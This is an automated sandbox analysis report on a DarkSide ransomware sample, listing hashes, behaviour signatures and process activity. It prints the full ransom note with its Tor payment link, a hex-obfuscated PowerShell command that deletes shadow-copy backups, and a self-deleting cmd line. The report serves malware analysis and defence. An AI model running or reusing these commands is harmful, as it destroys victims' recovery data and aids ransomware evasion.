Overview

overview

10

Static

static

8

1667e16357...43.exe

windows7_x64

3

1667e16357...43.exe

windows10_x64

3

17139a10fd...61.exe

windows7_x64

10

17139a10fd...61.exe

windows10_x64

10

1cc7c198a8...cb.exe

windows7_x64

10

1cc7c198a8...cb.exe

windows10_x64

10

243dff06fc...60.exe

windows7_x64

10

243dff06fc...60.exe

windows10_x64

10

27214dcb04...8f.exe

windows7_x64

10

27214dcb04...8f.exe

windows10_x64

10

3dabd40d56...a6.exe

windows7_x64

3

3dabd40d56...a6.exe

windows10_x64

3

43e61519be...aa.exe

windows7_x64

10

43e61519be...aa.exe

windows10_x64

10

48a848bc9e...3a.exe

windows7_x64

10

48a848bc9e...3a.exe

windows10_x64

10

508dd6f7ed...dd.exe

windows7_x64

10

508dd6f7ed...dd.exe

windows10_x64

10

516664139b...4b.exe

windows7_x64

10

516664139b...4b.exe

windows10_x64

10

533672da9d...8d.exe

windows7_x64

10

533672da9d...8d.exe

windows10_x64

10

6228f75f52...ff.exe

windows7_x64

10

6228f75f52...ff.exe

windows10_x64

10

6836ec8588...d8.exe

windows7_x64

3

6836ec8588...d8.exe

windows10_x64

3

68872cc22f...e7.exe

windows7_x64

10

68872cc22f...e7.exe

windows10_x64

10

691515a485...a5.exe

windows7_x64

10

691515a485...a5.exe

windows10_x64

10

78782fd324...34.exe

windows7_x64

1

78782fd324...34.exe

windows10_x64

10

Resubmissions

27-01-2024 19:37

240127-yb5pksafd3 10

27-01-2024 19:36

240127-ybqwesafc2 10

12-05-2021 15:56

210512-db4t7vmwas 10

Analysis

  • max time kernel
    139s
  • max time network
    141s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    12-05-2021 15:56

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe

  • Size

    59KB

  • MD5

    f9fc1a1a95d5723c140c2a8effc93722

  • SHA1

    ce2480dec2ee0a47549fad355c3cf154f9aab836

  • SHA256

    43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa

  • SHA512

    3816029ac654cfc546e78c5f331ad61ef21ebab0e92bacdba5a5d2cd9149002930cf46c9a1dab357697540849229d2fc0a490433aa95713d36685334ce8e8b11

Score
10/10
darksideransomwarespywarestealer

Malware Config

Extracted

Path

C:\\README.341d6443.TXT

Family

darkside

Ransom Note
----------- [ Welcome to DarkSide ] -------------> What happend? ---------------------------------------------- Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. Follow our instructions below and you will recover all your data. What guarantees? ---------------------------------------------- We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. We guarantee to decrypt one file for free. Go to the site and contact us. How to get access on website? ---------------------------------------------- Using a TOR browser: 1) Download and install TOR browser from this site: https://torproject.org/ 2) Open our website: http://darksidfqzcuhtk2.onion/DZYNTXY9RP5P8DQ96EFKV2YTOVAMA3VVHL5V0RASUBLBWZGLG51U4LOOBSHV9R0Y When you open our website, put the following data in the input form: Key: k1xICnEwA8i4Exaf4zIjmEWUAK2JUsPppp7hmFIkcNOrmtfztXYRZSKEorEsHiVAg8gIcnQe7gLRyHyJg5knONhaC09HlFh6pr8Ze6Q8hGhKCm2s2OSBStASleEhgnzUaPkJzRNcaENVKONFOZjCg10YHEjNrfuE8JawoVmpQrws6XsdgiXD2E0D1VwxTCAMsDjMY7tpNOgBqY8NWoFYIWhkEoCDjp52OTKNCZfBSR3uinUDqXkUMApbz6JQ00VdTlJqjBH4QS7o73lU2Vtbr7CkQR9q5nXYLlgMKZUNiH4p0dWISOfEHmJWaWIeK1xkMIqqeao5CMf9enqc3xAG4zfW3iaUEQBwS0cDkv2aQCPFHARd71L9sZAtjcedVolkwYUqnBA9HiZRzoX7CmyX1D99XvN4HCzUmSYm0Nzr3goQSB1obYAKoKomDRTtZpLnTblmRkQoYj4dOJFiiXEdA7OswuJUeavsdO8v2XFzweyVNRNLcFy0v6OtQtRxklvgLBy4zztKaiNz7WUBzS2J5HlC7gwpnLclBloh07Bz0AI0clGIWLZf6kb !!! DANGER !!! DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. !!! DANGER !!!
URLs

http://darksidfqzcuhtk2.onion/DZYNTXY9RP5P8DQ96EFKV2YTOVAMA3VVHL5V0RASUBLBWZGLG51U4LOOBSHV9R0Y

Signatures

  • DarkSide

    Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.

    ransomwaredarkside
  • Modifies extensions of user files 10 IoCs

    Ransomware generally changes the extension on encrypted files.

    ransomware
  • Deletes itself 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Sets desktop wallpaper using registry 2 TTPs 2 IoCs
    ransomware
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies Control Panel 1 IoCs
    evasion
  • Modifies registry class 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 24 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe
    "C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe"
    1⤵
    • Modifies extensions of user files
    • Sets desktop wallpaper using registry
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Modifies Control Panel
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1844
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1500
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /C DEL /F /Q C:\Users\Admin\AppData\Local\Temp\43E615~1.EXE >> NUL
      2⤵
      • Deletes itself
      PID:2832
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:1420

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1500-66-0x000000001AD34000-0x000000001AD36000-memory.dmp

    Filesize

    8KB

    Download

  • memory/1500-63-0x0000000002310000-0x0000000002311000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1500-64-0x000000001ADB0000-0x000000001ADB1000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1500-65-0x000000001AD30000-0x000000001AD32000-memory.dmp

    Filesize

    8KB

    Download

  • memory/1500-67-0x0000000002350000-0x0000000002351000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1500-68-0x0000000001E40000-0x0000000001E41000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1500-69-0x000000001C650000-0x000000001C651000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1500-70-0x000000001C720000-0x000000001C721000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1500-62-0x000007FEFB881000-0x000007FEFB883000-memory.dmp

    Filesize

    8KB

    Download

  • memory/1844-60-0x0000000075561000-0x0000000075563000-memory.dmp

    Filesize

    8KB

    Download